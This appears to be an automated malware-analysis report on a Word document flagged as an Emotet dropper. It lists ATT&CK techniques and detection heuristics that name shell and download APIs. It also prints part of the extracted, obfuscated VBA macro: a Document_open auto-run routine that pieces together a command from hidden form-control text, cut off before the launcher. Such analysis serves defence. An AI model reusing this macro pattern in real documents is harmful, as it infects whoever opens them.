MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emotet-7446532-0'. Static analysis reveals a VBA macro within the 'Document_open' subroutine. This macro utilizes `CreateObject` and WMI (`winmgmts`) to launch a process, a common technique for downloading and executing secondary payloads. The obfuscation of 'winmgmts' from split string literals further indicates malicious intent.
Heuristics 8
-
ClamAV: Doc.Dropper.Emotet-7446532-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-7446532-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7767 bytes |
SHA-256: 0a34e6541a28c8152a49011e462594294a8176798b75d63f7131e2c355ee4517 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zzbhpyvzjapvn"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Dfsxmommomcw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Pfdegvrzwad = Qqiuciwkry To 0
Wkkvmzjh = (13 - Atn(51) - (44 + Round(41) * Gkghpbavpylaq / CInt(1)))
Select Case Obareyhadkl
Case Kauxztjx
Svkwjdqvtyhy = CLng(Pjyzjcxetw)
Enbxbqahhvt = Oct(Wnosjwlckhpuk)
Case Wobnluzctv
Yqctpwanpjm = Ymtfmdrc
Sufqdxkvwm = Int(29)
End Select
Next
For Rbbxralsfhtmc = Vqcyekacnwh To 0
Idozgszrlnyy = (13 - Atn(51) - (44 + Round(41) * Mupidzzc / CInt(1)))
Select Case Jolqyobkiuj
Case Tfkwvkcdzekn
Nesrfgbqshisw = CLng(Qgqkbvdtcds)
Jjbcpqngpc = Oct(Rdncncnqpjytc)
Case Kkpnmlrg
Gdgyiadmo = Pqoafduzlhzi
Vaoskzwf = Int(29)
End Select
Next
For Qfxvjnnlzm = Ifavfwjn To 0
Kncypwagq = (13 - Atn(51) - (44 + Round(41) * Ryeagucj / CInt(1)))
Select Case Tdgeikenpz
Case Jukslxqltwg
Hwvzcgdmxqj = CLng(Glwsbdsbojpn)
Twpxxgnbo = Oct(Nshcmdawsqf)
Case Vchosmfl
Kqhslpff = Eollzcfpqqo
Pcvzzibdc = Int(29)
End Select
Next
Dklvjiocxj
End Sub
Attribute VB_Name = "Hgswgbwtxfs"
Attribute VB_Base = "0{AE918360-1600-4D7F-8D9B-C79E96F20746}{1DFEF283-E789-44C7-B975-D99DF9032484}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Yjxweksts"
Function Ruxhnwdfq()
For Ulnwebwudsmjm = Txouozij To 0
Ahwwrslam = (13 - Atn(51) - (44 + Round(41) * Djkjvzjdvsf / CInt(1)))
Select Case Rbwuoalbrpd
Case Ylzajaznqndlt
Gzovthepwqmmo = CLng(Ugovaxdujf)
Bosjvamu = Oct(Ibstvdjx)
Case Betxwxycdf
Ffdbehqmbrt = Nchbaklrcawvv
Bkrmwtvnquycg = Int(29)
End Select
Next
Juentcyhgac = Zzbhpyvzjapvn.Dfsxmommomcw
For Rzbjircoxjqmf = Ivndduwqjwn To 0
Qysapowiid = (13 - Atn(51) - (44 + Round(41) * Katrszkfwsku / CInt(1)))
Select Case Duismuisy
Case Pxqrezraktu
Qwddnynxlikbz = CLng(Skrbuzcctns)
Tfoirjbqqefa = Oct(Epgpekbizcti)
Case Ukpvguegtbk
Abgmbjgxnmy = Rkfmpjknv
Kuqoyvefowa = Int(29)
End Select
Next
Ifaojchz = Juentcyhgac + Hgswgbwtxfs.Sopbjkezvlra + Hgswgbwtxfs.Stxynhxh + Hgswgbwtxfs.Wgyhveophhip
For Gwaeoprovs = Ofpdztyuib To 0
Cfmsrfziny = (13 - Atn(51) - (44 + Round(41) * Rlajrzpxf / CInt(1)))
Select Case Lzbqsvfderrcj
Case Wpsbvpgklotpc
Heagbsqogm = CLng(Uoairhscafeh)
Pqczgcusj = Oct(Cafgblon)
Case Wkfbhkglca
Xdalhgfbcengo = Vytptqstfx
Snggnifdcgpeh = Int(29)
End Select
Next
Rnnxdquvtnjbd = Ifaojchz + Hgswgbwtxfs.Kjyooqae + Hgswgbwtxfs.Zvjrloay.ControlTipText
For Caxojfqdit = Sthjyhahiqd To 0
Qbkxlxpevltal = (13 - Atn(51) - (44 + Round(41) * Wruatxqdadqq / CInt(1)))
Select Case Bmwwstdggx
Case Lwiojmnhkrvd
Zyjtvheuuzwet = CLng(Qlxdzluvmud)
Zkqtottf = Oct(Cporbirftm)
Case Gyzinedxzrec
Idqagjtyvo = Smvpkpieestf
Cznkkmwrano = Int(29)
End Select
Next
Ruxhnwdfq = Yqxewpxws + Rnnxdquvtnjbd + Yqxewpxws
For Higspbdws = Wawbhsqgdtmq To 0
Bjcasyhknkzu = (13 - Atn(51) - (44 + Round(41) * Dqmxjaqjeawoz / CInt(1)))
Select Case Ovrjznrbwaxn
Case Lcnoudngph
Sfcdeztr = CLng(Hkdjloqxmme)
Xjzflfhfjmyu = Oct(Swxuunwuclkry)
Case Vjwwneteuhlr
Yepzpyaoskivd = Uuhrnoccxyv
Dnjvmvdhvrjr = Int(29)
End Select
Next
End Function
Function Dklvjiocxj()
For Bvniinkaejyce = Qzu
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.